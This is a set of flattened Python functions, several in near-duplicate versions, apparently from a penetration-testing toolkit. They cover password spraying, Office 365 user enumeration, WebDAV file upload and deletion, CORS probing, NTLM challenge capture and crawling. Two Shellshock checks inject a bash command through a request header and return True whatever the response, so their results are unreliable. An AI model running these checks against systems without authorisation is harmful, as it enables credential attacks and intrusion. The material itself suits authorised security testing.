def webdav_check(url): try: if web_request(url, 'PROPFIND').status_code == 207: return True except: return False return False
def worker(context): code = 0 try: a = auth_handler(context.user, context.password, auth_type=context.auth_type) r = web_request(context.target, method=context.method, timeout=context.timeout, proxies=context.proxy, auth=a) code = r.status_code size = len(r.text) except Exception as e: pass if code not in [0, 401]: cliLogger.success("{:<35} {:<30} {:<24} (Code: {} | Size: {})".format( context.user, context.password, highlight('Success', fg='green'), code, size)) elif context.verbose: cliLogger.fail("{:<35} {:<30} {:<24} (Code: {} | Size: {}))".format( context.user, context.password, highlight('Failed', fg='red'), code, size)) fileLogger.info("{}\t{}\t{}\t{}\t{}".format(get_timestamp(), context.target, code, context.user, context.password)) sleep(context.jitter)
def cors_check(url, test_addr='example123abc.com', timeout=5, proxies=[], debug=False): data = {} header = { 'User-Agent': choice(USERAGENTS), 'Referer': url, 'Origin': test_addr } try: resp = web_request(url, header, timeout=timeout, proxies=proxies, debug=debug) cors = extract_header('Access-Control-Allow-Origin', resp) if cors in [test_addr, '*']: data['Access-Control-Allow-Origin'] = cors for key, val in resp.headers.items(): if key.startswith( 'Access-Control-Allow' ) and key != 'Access-Control-Allow-Origin': data[key] = val.strip() except: return False return data
def crawl(self, src_url): src_url = self.linkModifier(src_url) next_depth = (self.__cur_depth + 1) resp = web_request(src_url, timeout=self.conn_timeout, proxies=self.proxies) if resp: self.pageParser(resp, next_depth)
def crawl(self, src_url): ''' Execute web request and send to parser ''' src_url = self.linkModifier(src_url) next_depth = (self.__cur_depth + 1) resp = web_request(src_url, timeout=self.conn_timeout, headers=self.headers, proxies=self.proxies) if get_statuscode(resp) != 0: self.pageParser(resp, next_depth)
def o365_validateUser(user, timeout, headers={}, proxy=[], verbose=False): url = 'https://outlook.office365.com/autodiscover/autodiscover.json/v1.0/{user}?Protocol=Autodiscoverv1' headers['Accept'] = 'application/json' r = web_request(url.format(user=user), redirects=False, timeout=timeout, headers=headers, proxies=proxy) if get_statuscode(r) == 200: logger.success([user]) ledger.info(user) elif verbose: logger.fail([user])
def putFile(url, timeout=4, data='TASER', data_ext=".txt", headers={}, content_type="text/plain", proxies=[], debug=False): upload_file = gen_random_string(5) + data_ext target_url = rm_slash(url) + "/" + upload_file h = { 'Host': extract_subdomain(url), 'Content-Type': content_type, 'Content-Length': str(len(data)), 'Connection': 'close' } for k, v in headers.items(): h[k] = v r1 = web_request(target_url, method='PUT', headers=h, data=data, timeout=timeout, proxies=proxies, debug=debug) # Check via status code if r1 and r1.status_code in [200, 204, 202]: # Verify r2 = web_request(target_url, method='GET', timeout=timeout, proxies=proxies, debug=debug) if r2 and r2.status_code == 200 and data in r2.text: return upload_file return False
def tryHTTP(target, port, timeout, ssl=False, verbose=False, proxies=[]): schema = "https://" if ssl else "http://" t = schema + target + ":" + str(port) resp = web_request(t, timeout=timeout, debug=verbose, proxies=proxies) code = get_statuscode(resp) if code != 0: title = get_pagetitle(resp) server = extract_header('Server', resp) cliLogger.write( "{:40} code: {:<3} | Size: {:<6}\tServer:{:<15}\tTitle:{}".format( t, code, len(resp.text), server, title)) fileLogger.info( "{:40} code: {:<3} | Size: {:<6}\tServer:{:<15}\tTitle:{}".format( t, code, len(resp.text), server, title)) return True return False
def shellshock(url, target="User-Agent", timeout=5, proxies=[], debug=False): header = { target: "() { :; }; echo; echo; /bin/bash -c 'a=$((74*80*1103)) && echo Test-$a'" } resp = web_request(url, headers=header, timeout=timeout, proxies=proxies, debug=debug) if resp and "Test-6529760" in resp.text: return True return True
def prompt_NTLM(url, timeout, proxies=[]): challenge = {} h = { 'Authorization': 'NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=', } request = web_request(url, timeout=timeout, headers=h, proxies=proxies) if request.status_code not in [401, 302]: return challenge auth_header = request.headers.get('WWW-Authenticate') if not auth_header: return challenge challenge_message = base64.b64decode(auth_header.split(' ')[1].replace(',', '')) challenge = parse_challenge(challenge_message) return challenge
def deleteFile(url, filename, timeout=4, proxies=[], headers={}, debug=False): target_url = rm_slash(url) + "/" + filename h = {'Host': extract_subdomain(url), 'Connection': 'close'} for k, v in headers.items(): h[k] = v r = web_request(target_url, method='DELETE', headers=h, timeout=timeout, proxies=proxies, debug=debug) if r and r.status_code in [200, 204, 202]: return True return False
def prompt_NTLM(url, timeout, headers={}, proxies=[], debug=False): challenge = {} h = headers.copy() h['Authorization'] = 'NTLM TlRMTVNTUAABAAAAB4IIAAAAAAAAAAAAAAAAAAAAAAA=' request = web_request(url, headers=h, timeout=timeout, proxies=proxies, debug=debug) if get_statuscode(request) not in [401, 302]: return challenge # get auth header auth_header = request.headers.get('WWW-Authenticate') if not auth_header or not 'NTLM' in auth_header: return challenge # get challenge message from header challenge_message = base64.b64decode(auth_header.split(' ')[1].replace(',', '')) # parse challenge challenge = parse_challenge(challenge_message) return challenge
def search(self): timer = self.start_timer() self.total_links = 0 # Total Links found by search engine self.page_links = 0 # Total links found by search engine w/ our domain in URL found_links = 0 # Local count to detect when no new links are found while timer.running: if self.total_links > 0 and found_links == self.page_links: timer.stop() return self.links found_links = self.page_links search_url = self.generateURL() resp = web_request(search_url, timeout=self.conn_timeout, headers=self.headers, proxies=self.proxies) if get_statuscode(resp) != 0: self.user_output(resp) self.pageParser(resp) timer.stop() return self.links
def search(self, search_engine, search_query): search_timeout = TaserTimeout(self.timeout) search_timeout.start() self.total_links = 0 # Total Links found by search engine self.page_links = 0 # Total links found by search engine w/ our domain in URL found_links = 0 # Local count to detect when no new links are found while search_timeout.running: if self.total_links > 0 and found_links == self.page_links: search_timeout.stop() return self.links found_links = self.page_links search_url = self.linkModifier(search_engine, search_query) resp = web_request(search_url, timeout=self.conn_timeout, proxies=self.proxies) if resp: self.pageParser(resp, search_engine, search_query) search_timeout.stop() return self.links
def minion(url): resp = web_request(url, proxies=args.proxy, debug=args.verbose) if get_statuscode(resp) != 0: output_handler(resp, args)
def shellshock_check(url, timeout=5, proxies=[]): header = {"User-Agent": "() { :; }; echo; echo; /bin/bash -c 'a=$((74*80*1103)) && echo Test-$a'"} resp = web_request(url, headers=header, timeout=timeout, proxies=proxies) if resp and "Test-6529760" in resp.text: return True return True
def minion(url): resp = web_request(url, proxies=args.proxy, debug=args.verbose) if resp: output_handler(resp, args)
def minion(url, args): resp = web_request(url) if resp: output_handler(resp, args)
# TESTING ONLY import sys sys.path.append('..') from time import sleep from taser.proto.http import web_request # Site to simply reflect the requesting ip address target = 'http://ident.me' # proxy_list proxies = [ 'socks4://proxy.com:52616', 'socks5://proxy.com:9000', ] for x in range(0, 3): print('\nSending Request') r = web_request(target, proxies=proxies, headers={'X-Forwarded-For': '127.0.0.1'}, max_retries=1, timeout=3, debug=True) if r: print(r.text) else: print('Error: No response') sleep(1)